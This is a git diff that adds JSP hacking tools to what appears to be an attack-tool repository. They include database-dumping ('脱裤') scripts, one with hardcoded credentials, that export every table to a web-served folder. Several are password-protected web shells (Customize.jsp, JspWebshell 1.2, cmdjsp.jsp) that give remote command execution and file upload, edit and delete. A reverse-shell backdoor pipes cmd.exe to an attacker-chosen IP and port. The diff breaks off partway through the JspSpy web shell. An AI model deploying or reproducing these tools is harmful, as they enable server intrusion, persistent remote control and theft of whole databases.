diff --git a/drag/mysql_jsp脱裤.txt b/drag/mysql_jsp脱裤.txt new file mode 100644 index 0000000..54ca712 --- /dev/null +++ b/drag/mysql_jsp脱裤.txt @@ -0,0 +1,89 @@ +<%@ page import="java.sql.*" %> +<%@ page import="java.util.*" %> +<%@ page import="java.io.*" %> +<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> +<% +try { + //±¸·ގļ�ľ�¾¶ + String backupDir = "/home/tomcat-oa/webapps/ROOT/video/ab1/"; + String ex=".txt"; + String driver = "com.mysql.jdbc.Driver"; + + String url = "jdbc:mysql://localhost:3306/oa"; + String username = "oa"; + String password = "LOa2(2.DX,v>15^td8nWe!L"; + + Class.forName(driver); + Connection conn = DriverManager.getConnection(url, username, password); + + // Get tables + DatabaseMetaData dmd = conn.getMetaData(); + ResultSet rs = dmd.getTables(null, null, "%", null); + ArrayList tables = new ArrayList(); + while (rs.next()) { + tables.add(rs.getString(3)); + } + rs.close(); + + + + ResultSetMetaData rsmd = null; + Statement stmt = conn.createStatement(); + for (String table : tables) { + + rs = stmt.executeQuery("SHOW CREATE TABLE " + table); + rsmd = rs.getMetaData(); + while (rs.next()) { + /* + * mysql> SHOW CREATE TABLE t\G + *************************** 1. row *************************** + * Table: t + * Create Table: CREATE TABLE t ( + * id int(11) default NULL auto_increment, + * s char(60) default NULL, + * PRIMARY KEY (id) + * ) TYPE=MyISAM + */ + // JDBC is 1-based, Java is not !? +// osw.append(rs.getString(2) + "\n\n"); + } + rs.close(); + + out.println("Dumping data for table " + table + "...
"); + OutputStreamWriter osw = new OutputStreamWriter(new FileOutputStream(backupDir+table+ex), "UTF-8"); + BufferedWriter bw=new BufferedWriter(osw); + rs = stmt.executeQuery("SELECT * FROM " + table); + rsmd = rs.getMetaData(); + while (rs.next()) { + bw.append("INSERT INTO " + table + " VALUES("); + // JDBC is 1-based, Java is not !? + for (int col = 1; col <= rsmd.getColumnCount(); col++) { + bw.append("'"); + if (rs.getString(col) == null) + bw.append(""); + else + bw.append(rs.getString(col)); + if (col == rsmd.getColumnCount()) + bw.append("'"); + else + bw.append("',"); + } + bw.append(");"); + bw.newLine(); + } + bw.flush(); + bw.close(); + osw.close(); + rs.close(); + } + stmt.close(); + + out.println("backup is ok"); + + conn.close(); +} catch (Exception e) { + response.setStatus(200); + e.printStackTrace(); +} +out.println("

finished

"); +%> diff --git a/drag/oracle_jsp脱裤.txt b/drag/oracle_jsp脱裤.txt new file mode 100644 index 0000000..efcd7cd --- /dev/null +++ b/drag/oracle_jsp脱裤.txt @@ -0,0 +1,321 @@ +<%@ page language="java" import="java.util.*" pageEncoding="GBK"%> + +<%@ page import="oracle.jdbc.*"%> + +<%@ page import="java.sql.*" %> + +<%@ page contentType="text/html; charset=GBK" %> + +<%@ page import="java.io.*" %> + +<% + +String path = request.getContextPath(); + +String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/"; + +%> + + + + + + + + + + + + XXOO + + + + + + + + + + + + + + + + + + + + <% + + String url = "http://" + request.getServerName() + ":" + request.getServerPort() + request.getContextPath()+request.getServletPath(); + + Class.forName("oracle.jdbc.driver.OracleDriver").newInstance(); + + ResultSet rs=null; + + ResultSet rs_column=null; + + ResultSet rs_dump=null; + + String oraUrl="jdbc:oracle:thin:@192.168.1.81:1521:db"; + + String oraUser="username"; + + String oraPWD="password"; + + int size=30000; + + try + + { + + DriverManager.registerDriver(new oracle.jdbc.driver.OracleDriver()); + + } + + catch (SQLException e){ + + out.print("filed!!"); + + } + + try + + { + + Connection conn=DriverManager.getConnection(oraUrl,oraUser,oraPWD); + + conn.setAutoCommit(false); + + if (request.getParameter("table") == null || request.getParameter("table").equals("")) + + { + + out.print("xixi...
"); + + Statement stmt=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE); + + rs=stmt.executeQuery("select table_name from all_tables"); + + while(rs.next()) + + { + + out.print("");out.print(rs.getString(1));out.print("
"); + + } + + rs.close(); + + stmt.close(); + + } + + else + + { + + out.print("Current table : "+request.getParameter("table")); + + String sql_count="select count(*) from all_tab_columns where Table_Name='"+request.getParameter("table")+"'"; + + String sql_column="select * from all_tab_columns where Table_Name='"+request.getParameter("table")+"'"; + + String sql_columns_count="select count(*) from "+request.getParameter("table"); + + //String sql_dump="select rownom ro,* from T_SYS_USER"; + + Statement stmt_count=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE); + + Statement stmt_column=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE); + + Statement stmt_columns_count=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE); + + rs=stmt_count.executeQuery(sql_count); + + rs_column=stmt_column.executeQuery(sql_column); + + ResultSet rs_columns_count=null; + + rs_columns_count=stmt_columns_count.executeQuery(sql_columns_count); + + + + conn.commit(); + + int count=0; + + while(rs.next()) + + { + + count=Integer.parseInt(rs.getString(1)); + + //out.print(count); + + } + + int columns_count=0; + + while(rs_columns_count.next()) // Total number of records + + { + + columns_count=Integer.parseInt(rs_columns_count.getString(1)); + + out.print("
The number of records : "+columns_count+"
"); + + } + + //out.print(columns_count); + + int column_num=1; + + //out.print("");out.print(""); + + String sql_dump="select * from (select rownum ro "; //SELECT + + while(rs_column.next()) + + { + + //out.print(rs_column.getString(3));out.print("\r"); + + sql_dump+=","; + + sql_dump+=rs_column.getString(3); + + column_num+=1; + + + + } + + rs_column.close(); + + rs.close(); //close + + stmt_count.close(); + + stmt_column.close(); + + sql_dump+=" from "+request.getParameter("table")+" where rownum<="; + + int mark=0; + + mark=columns_count; + + out.print("


Please download:
"); + + while(true) + + { + + if(mark<=size) //one txt count + + { mark=0; } + + else + + { mark=mark-size; } + + String dump=sql_dump+columns_count+") where ro>="+mark; + + columns_count-=size; + + Statement stmt_dump=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE); + + rs_dump= stmt_dump.executeQuery(dump); + + conn.commit(); + + String filename = request.getRealPath(request.getParameter("table")+"-"+mark+".txt"); + + java.io.File f = new java.io.File(filename); + + if(!f.exists()) + + { f.createNewFile(); } + + try + + { + + PrintWriter pw = new PrintWriter(new FileOutputStream(filename)); + + while(rs_dump.next()) + + { + + column_num=1; + + while(column_num<=count) + + { + + pw.print(rs_dump.getString(column_num)); + + pw.print(","); + + column_num+=1; + + } + + pw.println(""); + + } + + pw.close(); + + } + + catch(IOException e) { + + out.println(e.getMessage()); + + } + + out.println("
"+request.getParameter("table")+"-"+mark+".txt
"); + + if(mark==0) + + { + + rs_dump.close(); + + stmt_dump.close(); + + break; + + } + + } + + } + + conn.close(); + + } catch (SQLException e) + + { + + System.out.println(e.toString()); + + out.print(e.toString()); + + } + + %> + + + + + + diff --git a/jsp/hackk8/JSP/Customize.jsp b/jsp/hackk8/JSP/Customize.jsp new file mode 100644 index 0000000..d3acce2 --- /dev/null +++ b/jsp/hackk8/JSP/Customize.jsp @@ -0,0 +1,59 @@ +<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%> +<%! +String Pwd="k8"; +String EC(String s,String c)throws Exception{return s;}//new String(s.getBytes("ISO-8859-1"),c);} +Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance(); +Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}return c;} +void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();} +void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile(); +FileOutputStream os=new FileOutputStream(f);for(int i=0;i<% +String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs); +String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs); +StringBuffer sb=new StringBuffer("");try{sb.append("->"+"|"); +if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}} +else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1)))); +while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();} +else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1)))); +bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);} +else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");} +else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");} +else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c); +MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);} +else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);} +}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString()); +%> \ No newline at end of file diff --git a/jsp/hackk8/JSP/JSP无组件实现WEB上传.rar b/jsp/hackk8/JSP/JSP无组件实现WEB上传.rar new file mode 100644 index 0000000..f81f6a1 Binary files /dev/null and b/jsp/hackk8/JSP/JSP无组件实现WEB上传.rar differ diff --git a/jsp/hackk8/JSP/Java Shell.jsp b/jsp/hackk8/JSP/Java Shell.jsp new file mode 100644 index 0000000..f15e864 --- /dev/null +++ b/jsp/hackk8/JSP/Java Shell.jsp @@ -0,0 +1,125 @@ +package enigma.shells.jython; + +import java.io.*; +import java.awt.*; +import javax.swing.*; + +import enigma.console.*; +import enigma.console.java2d.*; + +import org.python.core.*; +import org.python.util.*; + +public class JythonShell extends JPanel implements Runnable { + public static int DEFAULT_ROWS = 20; + public static int DEFAULT_COLUMNS = 80; + public static int DEFAULT_SCROLLBACK = 100; + + public PrintStream out; + + public Console console; + public Java2DTextWindow text; + public JScrollPane scrollPane; + public PythonInterpreter interp; + + private Color colorBackground = new Color(0, 0, 0); + private Color colorForeground = new Color(187, 187, 187); + private Color colorError = new Color(187, 0, 0); + private Color colorCursor = new Color(187, 187, 0); + + public JythonShell() { + this(null, Py.getSystemState()); + } + + public JythonShell(PyObject dict) { + this(dict, Py.getSystemState()); + } + + public JythonShell(int columns, int rows, int scrollback) { + this(null, Py.getSystemState(), columns, rows, scrollback); + } + + public JythonShell(PyObject dict, PySystemState systemState) { + this(dict, systemState, DEFAULT_COLUMNS, DEFAULT_ROWS, DEFAULT_SCROLLBACK); + } + + public JythonShell(PyObject dict, PySystemState systemState, int columns, int rows, int scrollback) { + super(new BorderLayout()); + + text = new Java2DTextWindow(columns, rows, scrollback); + text.setBackground(colorBackground); + + scrollPane = new JScrollPane(); + scrollPane.setViewportView(text); + + add(scrollPane, BorderLayout.CENTER); + + console = new DefaultConsoleImpl(text); + out = console.getOutputStream(); + + interp = new PythonInterpreter(dict, systemState); + interp.setOut(out); + interp.setErr(out); + } + + public void run() { + int pos = 0; + int tbs = 4; + + String line = ""; + String command = ""; + + for (;;) { + String space = ""; + for (int i = 0; i < pos * tbs; i++) { + space += " "; + } + + try { + console.setTextAttributes(new TextAttributes(colorCursor)); + + if (pos > 0) { + out.print(space + "... "); + } else { + out.print(">> "); + } + + console.setTextAttributes(new TextAttributes(colorForeground)); + + line = console.readLine().trim(); + if (line.length() == 0 && pos > 0) { + pos--; + } else if (line.endsWith(":")) { + command += space + line + "\n"; + pos++; + } else { + command += space + line + "\n"; + } + + if (pos == 0) { + interp.exec(command); + command = ""; + } + } catch (Exception e) { + console.setTextAttributes(new TextAttributes(colorError)); + + e.printStackTrace(); + command = ""; + } + } + } + + public static void main(String[] argv) { + PySystemState.initialize(System.getProperties(), null, argv); + + JFrame frame = new JFrame("Jython Console"); + JythonShell console = new JythonShell(); + + frame.add(console, BorderLayout.CENTER); + frame.pack(); + frame.setVisible(true); + frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); + + console.run(); + } +} \ No newline at end of file diff --git a/jsp/hackk8/JSP/JspWebshell 1.2.jsp b/jsp/hackk8/JSP/JspWebshell 1.2.jsp new file mode 100644 index 0000000..4ce0fcf --- /dev/null +++ b/jsp/hackk8/JSP/JspWebshell 1.2.jsp @@ -0,0 +1,788 @@ +<%@ page contentType="text/html; charset=GBK" language="java" import="java.sql.*,java.io.File,java.io.*,java.nio.charset.Charset,java.io.IOException,java.util.*" errorPage="" %> +<% +/** + *

Title:JspWebshell

+ * + *

Description: jspվ

+ * + *

Copyright:[B.C.T] Copyright (c) 2006

+ * + *

Company: zero.cnbct.org

+ * PS:СܴȤдϵQQ:48124012 + * @version 1.2 + */ + String path=""; + String selfName=""; + boolean copyfinish=false; +%> +<% selfName=request.getRequestURI(); + // String editfile=""; + String editfile=request.getParameter("editfile"); + if (editfile!=null) + {editfile=new String(editfile.getBytes("ISO8859_1")); + } + path=request.getParameter("path"); + if(path==null) + path=config.getServletContext().getRealPath("/"); +%> +<%! + String _password ="111";// + public String readAllFile(String filePathName) throws IOException + { + FileReader fr = new FileReader(filePathName); + int count = fr.read(); + String res=""; + while(count != -1) + { + //System.out.print((char)count); + res=res+(char)count; + count = fr.read(); + if(count == 13) + { + fr.skip(1); + } + } + fr.close(); + return res; + } +public void writeFile(String filePathName,String args) throws IOException +{ +FileWriter fw = new FileWriter(filePathName); +PrintWriter out=new PrintWriter(fw); +out.write(args); +out.println(); +out.flush(); +fw.close(); +out.close(); +} +public boolean createFile(String filePathName) throws IOException +{ +boolean result = false; +File file = new File(filePathName); +if(file.exists()) +{ +System.out.println("ļѾڣ"); +} +else +{ +file.createNewFile(); +result = true; +System.out.println("ļѾ"); +} +return result; +} +public boolean createFolder(String fileFolderName) +{ +boolean result = false; +try +{ +File file = new File(fileFolderName); +if(file.exists()) +{ +//file.delete(); +System.out.println("Ŀ¼Ѿ!"); +result = true; +} +else +{ +file.mkdir(); +System.out.println("Ŀ¼Ѿ!"); +result = true; +} +} +catch(Exception ex) +{ +result = false; +System.out.println("CreateAndDeleteFolder is error:"+ex); +} +return result; +} + +public boolean DeleteFolder(String filefolderName) +{ +boolean result = false; +try +{ +File file = new File(filefolderName); +if(file.exists()) +{ +file.delete(); +System.out.println("Ŀ¼ɾ!"); +result = true; +} +} +catch(Exception ex) +{ +result = false; +System.out.println("CreateAndDeleteFolder is error:"+ex); +} +return result; +} +public boolean validate(String password) { + if (password.equals(_password)) { + return true; + } else { + return false; + } +} +public String HTMLEncode(String str) { + str = str.replaceAll(" ", " "); + str = str.replaceAll("<", "<"); + str = str.replaceAll(">", ">"); + str = str.replaceAll("\r\n", "
"); + + return str; +} + public String exeCmd(String cmd) { + Runtime runtime = Runtime.getRuntime(); + Process proc = null; + String retStr = ""; + InputStreamReader insReader = null; + char[] tmpBuffer = new char[1024]; + int nRet = 0; + + try { + proc = runtime.exec(cmd); + insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB2312")); + while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) { + retStr += new String(tmpBuffer, 0, nRet); + } + + insReader.close(); + retStr = HTMLEncode(retStr); + } catch (Exception e) { + retStr = "\"" + cmd + "\""; + } finally { + return retStr; + } + } + public boolean fileCopy(String srcPath, String dstPath) { + boolean bRet = true; + + try { + FileInputStream in = new FileInputStream(new File(srcPath)); + FileOutputStream out = new FileOutputStream(new File(dstPath)); + byte[] buffer = new byte[1024]; + int nBytes; + + + while ((nBytes = in.read(buffer, 0, 1024)) != -1) { + out.write(buffer, 0, nBytes); + } + + in.close(); + out.close(); + } catch (IOException e) { + bRet = false; + } + + return bRet; +} +class EnvServlet +{ + public long timeUse=0; + public Hashtable htParam=new Hashtable(); + private Hashtable htShowMsg=new Hashtable(); + public void setHashtable() + { + Properties me=System.getProperties(); + Enumeration em=me.propertyNames(); + while(em.hasMoreElements()) + { + String strKey=(String)em.nextElement(); + String strValue=me.getProperty(strKey); + htParam.put(strKey,strValue); + } + } + public void getHashtable(String strQuery) + { + Enumeration em=htParam.keys(); + while(em.hasMoreElements()) + { + String strKey=(String)em.nextElement(); + String strValue=new String(); + if(strKey.indexOf(strQuery,0)>=0) + { + strValue=(String)htParam.get(strKey); + htShowMsg.put(strKey,strValue); + } + } + } + public String queryHashtable(String strKey) + { + strKey=(String)htParam.get(strKey); + return strKey; + } +/* public long test_int() + { + long timeStart = System.currentTimeMillis(); + int i=0; + while(i<3000000)i++; + long timeEnd = System.currentTimeMillis(); + long timeUse=timeEnd-timeStart; + return timeUse; + } + public long test_sqrt() + { + long timeStart = System.currentTimeMillis(); + int i=0; + double db=(double)new Random().nextInt(1000); + while(i<200000){db=Math.sqrt(db);i++;} + long timeEnd = System.currentTimeMillis(); + long timeUse=timeEnd-timeStart; + return timeUse; + }*/ +} +%> +<% + EnvServlet env=new EnvServlet(); + env.setHashtable(); + //String action=new String(" "); + //String act=new String("action"); + //if(request.getQueryString()!=null&&request.getQueryString().indexOf(act,0)>=0)action=request.getParameter(act); +%> + + + + +JspWebShell By + + + + +<% +//session.setMaxInactiveInterval(_sessionOutTime * 60); +String password=request.getParameter("password"); +if (password == null && session.getAttribute("password") == null) { + +%> + +
+
+ + + +
+ + + + + + + + + +
 8JspWebShell + version 1.2¼ :::...Power By +
+ + +
+ +<% + + } else { + + if (session.getAttribute("password") == null) { + + if (validate(password) == false) { + out.println("
    • "); + out.close(); + return; + } + + session.setAttribute("password", password); + } else { + password = (String)session.getAttribute("password"); + } +%> + <% + File tmpFile = null; + String delfile=""; + String delfile1=""; + String editpath=""; + delfile1=request.getParameter("delfile"); + editpath=request.getParameter("filepath"); + if (delfile1!=null) + {delfile=new String(delfile1.getBytes("ISO8859_1")); + } + if ( delfile1!= null) { + // out.print(delfile); + tmpFile = new File(delfile); + if (! tmpFile.delete()) { + out.print( "ɾʧ
    \n"); + } + } +%> + <%String editfilecontent=null; + String editfilecontent1=request.getParameter("content"); + // out.println(editfilecontent1); + //String save=request.getParameter("save"); + if (editfilecontent1!=null) + {editfilecontent=new String(editfilecontent1.getBytes("ISO8859_1"));} + // out.print(editfile); + //out.print(editfilecontent); + if (editfile!=null&editfilecontent!=null) + {try {writeFile(editfile,editfilecontent);} + catch (Exception e) {out.print("дʧ");} + out.print("дɹ"); + } + %> +<%request.setCharacterEncoding("GBK");%> +<%//String editfile=request.getParameter("editfile"); +//out.print(editfile); +if (request.getParameter("jsptz")!=null) +{%> +
    +
    + + + + + + + +
    ز +
    +
    + + + + + + + +
    JAVAز +
    +
    +
    +
    + +<%} +else{ +if (editfile!=null)//if edit +{ +%> +
    + + + + +
    +

    ַ + +

    +

    + + +

    +
    +

     

    +<%} +else{%> + + + + + + + + + + + + <%=path1%>" ENCTYPE="multipart/form-data"> + + + + + + <% String fileexe=""; + String dir=""; + String deldir=""; + String scrfile=""; + String dstfile=""; + fileexe=request.getParameter("fileexe"); + dir=request.getParameter("dir"); + deldir=request.getParameter("deldir"); + scrfile=request.getParameter("scrfile"); + dstfile=request.getParameter("dstfile"); + if (fileexe!=null) + { + //out.print(path+fileexe); + createFile(path+fileexe); + } + if (dir!=null) + { + //out.print(path+dir); + createFolder(path+dir); + } + if (deldir!=null) + { + //out.print(deldir); + DeleteFolder(deldir); + } + if (scrfile!=null&dstfile!=null) + { + //out.print(scrfile); + //out.print(dstfile); + copyfinish=fileCopy(scrfile, dstfile) ; + } + %> + + + + + + <%//ϴ + String tempfilename=""; + String up=request.getParameter("up"); + // String tempfilepath=request.getParameter("filepath"); + // out.print(tempfilepath); + if(up!=null) + { + tempfilename=(String)session.getId(); + //String tempfilename=request.getParameter("file"); + File f1=new File(tempfilepath,tempfilename); + int n; + try + { + InputStream in=request.getInputStream(); + BufferedInputStream my_in=new BufferedInputStream(in); + FileOutputStream fout=new FileOutputStream(f1); + BufferedOutputStream my_out=new BufferedOutputStream(fout); + byte[] b=new byte[10000]; + while((n=my_in.read(b))!=-1) + { + my_out.write(b,0,n); + } + my_out.flush(); + my_out.close(); + fout.close(); + my_in.close(); + in.close(); + // out.print("ļɹ!
    "); + } + catch(IOException e) + { + out.print("ļʧ!"); + } + + try + { + RandomAccessFile random1=new RandomAccessFile(f1,"r"); + random1.readLine(); + String filename=random1.readLine(); + byte[] b=filename.getBytes("ISO-8859-1"); + filename=new String(b); + int pointer=filename.lastIndexOf('\\'); + filename=filename.substring(pointer+1,filename.length()-1); + File f2=new File(tempfilepath,filename); + RandomAccessFile random2=new RandomAccessFile(f2,"rw"); + random1.seek(0); + for(int i=1; i<=4; i++) + { + String tempstr=random1.readLine(); + } + long startPoint=random1.getFilePointer(); + random1.seek(random1.length()); + long mark=random1.getFilePointer(); + int j=0; + long endPoint=0; + while((mark>=0)&&(j<=5)) + { + mark--; + random1.seek(mark); + n=random1.readByte(); + if(n=='\n') + + { + j++; + endPoint=random1.getFilePointer(); + } + } + long length=endPoint-startPoint+1; + int order=(int)(length/10000); + int left=(int)(length%10000); + byte[] c=new byte[10000]; + random1.seek(startPoint); + for(int i=0; i + + + + +
    JspWebShell + version 1.0(վĿ¼:<%=config.getServletContext().getRealPath("/")%>)
    + <% + File[] fs = File.listRoots(); + for (int i = 0; i < fs.length; i++){ + %> + ش(<%=fs[i].getPath()%>) + + <%}%> +
    +
    + + +
    +

    + <% + String cmd = ""; + InputStream ins = null; + String result = ""; + if (request.getParameter("command") != null) { + cmd = (String)request.getParameter("command");result = exeCmd(cmd);%> + <%=result == "" ? " " : result%> + <%}%> +

    + JSP̽
    + ļ + + +
    + ļ + + +
    + ļ + Ƶ + + +
    <%if(copyfinish==true) out.print("Ƴɹ");%>
    + <% try { + //path=request.getParameter("path"); + //if(path==null) + //path=config.getServletContext().getRealPath("/"); + File f=new File(path); + File[] fList= f.listFiles() ; + for (int j=0;j + <%=fList[j].getName()%>     ɾ
    + <% } + + }//for + } catch (Exception e) { + System.out.println("ڻûȨ"); + } + %> +       		+ <% try { + path=request.getParameter("path"); + if(path==null) + path=config.getServletContext().getRealPath("/"); + File f=new File(path); + File[] fList= f.listFiles() ; + for (int j=0;j + <%=fList[j].getName()%> + <%=path%>&editfile=<%=path%><%=fList[j].getName()%>" target="_blank">༭ +   ɾ
    + <% } + }//for + } catch (Exception e) { + System.out.println("ڻûȨ"); + } + %> +
    +

    Power By [B.C.T] QQ:48124012

    +

     

    +<%}//if edit +} +} +%> + + \ No newline at end of file diff --git a/jsp/hackk8/JSP/cmdjsp.jsp b/jsp/hackk8/JSP/cmdjsp.jsp new file mode 100644 index 0000000..2bd63ba --- /dev/null +++ b/jsp/hackk8/JSP/cmdjsp.jsp @@ -0,0 +1,31 @@ +// note that linux = cmd and windows = "cmd.exe /c + cmd" + +
    + + +
    + +<%@ page import="java.io.*" %> +<% + String cmd = request.getParameter("cmd"); + String output = ""; + + if(cmd != null) { + String s = null; + try { + Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd); + BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); + while((s = sI.readLine()) != null) { + output += s; + } + } + catch(IOException e) { + e.printStackTrace(); + } + } +%> + +
    +<%=output %>
+
    + diff --git a/jsp/hackk8/JSP/jsp-reverse.jsp b/jsp/hackk8/JSP/jsp-reverse.jsp new file mode 100644 index 0000000..6ce64c9 --- /dev/null +++ b/jsp/hackk8/JSP/jsp-reverse.jsp @@ -0,0 +1,90 @@ +// backdoor.jsp + + +<%@ +page import="java.lang.*, java.util.*, java.io.*, java.net.*" +% > +<%! +static class StreamConnector extends Thread +{ + InputStream is; + OutputStream os; + + StreamConnector(InputStream is, OutputStream os) + { + this.is = is; + this.os = os; + } + + public void run() + { + BufferedReader isr = null; + BufferedWriter osw = null; + + try + { + isr = new BufferedReader(new InputStreamReader(is)); + osw = new BufferedWriter(new OutputStreamWriter(os)); + + char buffer[] = new char[8192]; + int lenRead; + + while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0) + { + osw.write(buffer, 0, lenRead); + osw.flush(); + } + } + catch (Exception ioe) + + try + { + if(isr != null) isr.close(); + if(osw != null) osw.close(); + } + catch (Exception ioe) + } +} +%> + +

    JSP Backdoor Reverse Shell

    + +
    +IP Address + +Port + + +
    +

    +

    + +<% +String ipAddress = request.getParameter("ipaddress"); +String ipPort = request.getParameter("port"); + +if(ipAddress != null && ipPort != null) +{ + Socket sock = null; + try + { + sock = new Socket(ipAddress, (new Integer(ipPort)).intValue()); + + Runtime rt = Runtime.getRuntime(); + Process proc = rt.exec("cmd.exe"); + + StreamConnector outputConnector = + new StreamConnector(proc.getInputStream(), + sock.getOutputStream()); + + StreamConnector inputConnector = + new StreamConnector(sock.getInputStream(), + proc.getOutputStream()); + + outputConnector.start(); + inputConnector.start(); + } + catch(Exception e) +} +%> + diff --git a/jsp/hackk8/JSP/jspspy有屏幕.txt b/jsp/hackk8/JSP/jspspy有屏幕.txt new file mode 100644 index 0000000..570d090 --- /dev/null +++ b/jsp/hackk8/JSP/jspspy有屏幕.txt @@ -0,0 +1,2326 @@ +<%@page pageEncoding="UTF-8"%> +<%@page import="java.io.*"%> +<%@page import="java.util.*"%> +<%@page import="java.util.regex.*"%> +<%@page import="java.sql.*"%> +<%@page import="java.nio.charset.*"%> +<%@page import="javax.servlet.http.HttpServletRequestWrapper"%> +<%@page import="java.text.*"%> +<%@page import="java.net.*"%> +<%@page import="java.util.zip.*"%> +<%@page import="java.awt.*"%> +<%@page import="java.awt.image.*"%> +<%@page import="javax.imageio.*"%> +<%@page import="java.awt.datatransfer.DataFlavor"%> +<%@page import="java.util.prefs.Preferences"%> +<%! +/** + +*/ +private static final String PW = "k8team"; //password +private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd"; +private static final String REQUEST_CHARSET = "ISO-8859-1"; +private static final String PAGE_CHARSET = "UTF-8"; +private static final String CURRENT_DIR = "currentdir"; +private static final String MSG = "SHOWMSG"; +private static final String PORT_MAP = "PMSA"; +private static final String DBO = "DBO"; +private static final String SHELL_ONLINE = "SHELL_ONLINE"; +private static String SHELL_NAME = ""; +private static String WEB_ROOT = null; +private static String SHELL_DIR = null; +public static Map ins = new HashMap(); +private static class MyRequest extends HttpServletRequestWrapper { +public MyRequest(HttpServletRequest req) { +super(req); +} +public String getParameter(String name) { +try { +String value = super.getParameter(name); +if (name == null) +return null; +return new String(value.getBytes(REQUEST_CHARSET),PAGE_CHARSET); +} catch (Exception e) { +return null; +} +} +} +private static class DBOperator{ +private Connection conn = null; +private Statement stmt = null; +private String driver; +private String url; +private String uid; +private String pwd; +public DBOperator(String driver,String url,String uid,String pwd) throws Exception { +this(driver,url,uid,pwd,false); +} +public DBOperator(String driver,String url,String uid,String pwd,boolean connect) throws Exception { +Class.forName(driver); +if (connect) +this.conn = DriverManager.getConnection(url,uid,pwd); +this.url = url; +this.driver = driver; +this.uid = uid; +this.pwd = pwd; +} +public void connect() throws Exception{ +this.conn = DriverManager.getConnection(url,uid,pwd); +} +public Object execute(String sql) throws Exception { +if (isValid()) { +stmt = conn.createStatement(); +if (stmt.execute(sql)) { +return stmt.getResultSet(); +} else { +return stmt.getUpdateCount(); +} +} +throw new Exception("Connection is inValid."); +} +public void closeStmt() throws Exception{ +if (this.stmt != null) +stmt.close(); +} +public boolean isValid() throws Exception { +return conn != null && !conn.isClosed(); +} +public void close() throws Exception { +if (isValid()) { +closeStmt(); +conn.close(); +} +} +public boolean equals(Object o) { +if (o instanceof DBOperator) { +DBOperator dbo = (DBOperator)o; +return this.driver.equals(dbo.driver) && this.url.equals(dbo.url) && this.uid.equals(dbo.uid) && this.pwd.equals(dbo.pwd); +} +return false; +} +} +private static class StreamConnector extends Thread { +private InputStream is; +private OutputStream os; +public StreamConnector( InputStream is, OutputStream os ){ +this.is = is; +this.os = os; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[8192]; +int length; +while((length = in.read( buffer, 0, buffer.length ))>0){ +out.write( buffer, 0, length ); +out.flush(); +} +} catch(Exception e){} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){} +} +} +private static class OnLineProcess { +private String cmd = "first"; +private Process pro; +public OnLineProcess(Process p){ +this.pro = p; +} +public void setPro(Process p) { +this.pro = p; +} +public void setCmd(String c){ +this.cmd = c; + +} +public String getCmd(){ +return this.cmd; +} +public Process getPro(){ +return this.pro; +} +public void stop(){ +this.pro.destroy(); +} +} +private static class OnLineConnector extends Thread { +private OnLineProcess ol = null; +private InputStream is; +private OutputStream os; +private String name; +public OnLineConnector( InputStream is, OutputStream os ,String name,OnLineProcess ol){ +this.is = is; +this.os = os; +this.name = name; +this.ol = ol; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[128]; +if(this.name.equals("exeRclientO")) { +//from exe to client +int length = 0; +while((length = in.read( buffer, 0, buffer.length 